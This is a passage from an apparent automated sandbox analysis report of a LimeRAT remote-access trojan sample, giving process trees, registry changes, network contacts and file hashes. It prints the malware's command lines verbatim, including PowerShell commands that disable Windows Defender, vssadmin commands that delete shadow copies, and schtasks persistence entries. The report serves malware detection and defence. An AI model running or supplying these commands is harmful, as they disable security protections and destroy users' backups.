PID 748 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1856 wrote to memory of 4392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1856 wrote to memory of 4392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2232 wrote to memory of 1144 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2232 wrote to memory of 1144 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4444 wrote to memory of 988 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4444 wrote to memory of 988 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /sc ONLOGON /RL HIGHEST /tn MapsToastTask /tr "'C:\Users\Admin\AppData\Roaming\Branding\svchost.exe'"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "09:16" /sc daily /mo "1" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "11:06" /sc daily /mo "4" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "18:41" /sc daily /mo "1" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "22:43" /sc weekly /mo "2" /d "Fri" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "12:18" /sc monthly /m "feb" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 113.132.67.172.in-addr.arpa udp
US 8.8.8.8:53 ftp.encompossoftware.com udp
US 64.40.144.30:21 ftp.encompossoftware.com tcp
US 8.8.8.8:53 30.144.40.64.in-addr.arpa udp
US 64.40.144.30:34255 ftp.encompossoftware.com tcp

Files

memory/748-0-0x00007FF983743000-0x00007FF983744000-memory.dmp

memory/748-1-0x000002A481F60000-0x000002A481FA2000-memory.dmp

memory/748-7-0x00007FF983740000-0x00007FF98412C000-memory.dmp

memory/2880-12-0x00000216696C0000-0x00000216696E2000-memory.dmp

memory/2880-15-0x0000021669870000-0x00000216698E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ytgigfw1.u5h.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fb75f30f942ccc591174828552106c25
SHA1 3f487ec629fc80a2c2c3819e1cce71deef091559
SHA256 887721eb760a125f1e7d205261112791a664f6e9d763d0aafc36d7f8aed45647
SHA512 b0877cbc359b34fd90177136b347bdb423ff122082cd2c9d6146b259c01d9f3377b850891b2874b00be2e1058f3e58cb0f1d5d5de78b6de85744289c2d5937b0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 929e860c5b7e9cec83a622fcfd0349d2
SHA1 5052a3fad6546b26d8536ec3377e31946e0acb35
SHA256 55b4ad31d2cc299e1819512d4e86d39978b67fb711ef10d909746a6ed8783bbf
SHA512 2ae18278dc567f141f260d962aabe9dba46a2259bef2fd9c3c29549950ec87fd68adf37acb71acb6ece1d9503dc60733656988e640a0a6873becf6c61fe81244

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1352fb08cf60b98b878c7339aca43d55
SHA1 e142a79632f2a9af8c0b08234ee6546044242cc6
SHA256 ea38a095204163e757e1651ba91e12a838596439133f5fe10ec25bc62835cd87
SHA512 77ebdd62a59e27894bd91d1a7a0e8b84d5936504396f1b20ff745353f9dbea94b7b07aab8dadfdf15a73c56292533bd54f643a73525e2fb65ab4f44fb4d3ec7e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1e41198beccc226d287d0ee1f54459aa
SHA1 aedca1b8ec4180dba03a7ddc6ef12d8254d393f0
SHA256 a3d82d38511e2cfead13bb895b33f8e2a1d28d1248825defcaa6058e6e20c1e3
SHA512 c06bbf5d4568e312c204b05b47445deb2e5dae10661b9da6f5054e27d60336f45bbb6d498e968902f1aa3f3559a334dea70343b51b3c2fc7420495ee5dae4d42

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9dbc55570c6a0dd9d7dd07f6db15991e
SHA1 7eb6e41b96934c3f927290a90f650b0f3eaa8b5f
SHA256 28e747a21ceac52911a7a2ded7c8243e2cb55b28e2e93dbc526dc7233a06f81d
SHA512 da2fc8028fec4c9ce924a317e897facad41ce46bda3eb4454c8bb3c55dca88f7f01466b97d397ab9697e69bc30723b2eefdeff95c9e1547577cc81d7935ad55f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c54cce23e8e92aa511003c412c5f5089
SHA1 ba63e56ba1da2472d18b050b50c3bce52afe0958
SHA256 39b2d1a1fdab056182c372f81998cdc237fe52f9de59dc5bc000512be8434038
SHA512 8008682103b5f6011aa78f149a9e4c369d407165f3fcc304b4081894640be878d3729bd593ee99cfb090b66c5f937147cd7ef0f0c5d6d40cf8705f94ab9ecf44

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d1c31a5761a4e179f2f9ca05c69648ea
SHA1 9014edbc18cdaeae68ebaea1b7d43efc0a303b6f
SHA256 fb2ddd3a2a48093c7e8c36ecd960510bf9e1ab93ad9798495d9ed2bdc1c7d412
SHA512 65808f5d2c0b0fe99606f944f548392aeb4d3a4d848922f9e69f5fc86c8bd9d06ad00bf4df0d70e0f13426e64e25843b6f75ee61384e3971a60ec7ad6bfc4e4e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5320782f355d9abf2bbbc49819f5917a
SHA1 fea469b76ab94258b25bea3887fc11efe80b40b8
SHA256 10fb0a7d8875c8b3f5ee6ca5143de06832bc572164b4e250f922dc93d302f8b8
SHA512 c1d6ad13f1bb54e72576d82f59ea293ada4145a5bf9dc17c35d38d5c2fca5b114270dc61277e69b0f2c3e7f3cf70de4dbc3e7be3f0551b0b0da5c3b08bebdee3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5d1b688b15490bbab32b1c290c149c18
SHA1 1b9f28710e8e18adf2835aac22df830443ea882f
SHA256 203a1b2e0374cae759867a6039a808bb94f16ab80fce5534a6dd6c00ff49fc18
SHA512 6f5dc73ee402e5653e96e0763bbfdeb930c95c29a17dde0a036a20771dbe367d33a81f12c898c7ad94d81fa95cf645fb53b9e9c5e7ff671af8675f5700da4d1f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\4183903823\2290032291.pri

MD5 b8da5aac926bbaec818b15f56bb5d7f6
SHA1 2b5bf97cd59e82c7ea96c31cf9998fbbf4884dc5
SHA256 5be5216ae1d0aed64986299528f4d4fe629067d5f4097b8e4b9d1c6bcf4f3086
SHA512 c39a28d58fb03f4f491bf9122a86a5cbe7677ec2856cf588f6263fa1f84f9ffc1e21b9bcaa60d290356f9018fb84375db532c8b678cf95cc0a2cc6ed8da89436

C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\1601268389\715946058.pri

MD5 30ec43ce86e297c1ee42df6209f5b18f
SHA1 fe0a5ea6566502081cb23b2f0e91a3ab166aeed6
SHA256 8ccddf0c77743a42067782bc7782321330406a752f58fb15fb1cd446e1ef0ee4
SHA512 19e5a7197a92eeef0482142cfe0fb46f16ddfb5bf6d64e372e7258fa6d01cf9a1fac9f7258fd2fd73c0f8a064b8d79b51a1ec6d29bbb9b04cdbd926352388bae

memory/748-547-0x00007FF983743000-0x00007FF983744000-memory.dmp

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

MD5 16deda7a7a2e8f354fbff30ad723a711
SHA1 8730e18a2fc9722f7700c1192b3cc941169d7701
SHA256 4c93b44d1550229fd328c058fbbfe44999ba01e2766b4d3df17c777ce643925e
SHA512 6a19f30f3eca499e14ab97c5055420cc352852b9e5caeeaf016cd6c707dee6837b92bd7a49e7ca288e391205f3ae0786f43a4fef1ca01e5829594edfe60108cd

memory/748-553-0x00007FF983740000-0x00007FF98412C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-19 22:06

Reported

2024-06-19 22:07

Platform

win10v2004-20240508-en

Max time kernel

45s

Max time network

44s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Enumerates physical storage devices

Disables Windows logging functionality

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5056 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 4384 wrote to memory of 3964 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4384 wrote to memory of 3964 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4384 wrote to memory of 1276 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4384 wrote to memory of 1276 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 5056 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5056 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5056 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 4848 wrote to memory of 4108 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4848 wrote to memory of 4108 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4724 wrote to memory of 4644 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4724 wrote to memory of 4644 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4312 wrote to memory of 2364 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4312 wrote to memory of 2364 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5076 wrote to memory of 2440 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5076 wrote to memory of 2440 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3232 wrote to memory of 64 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
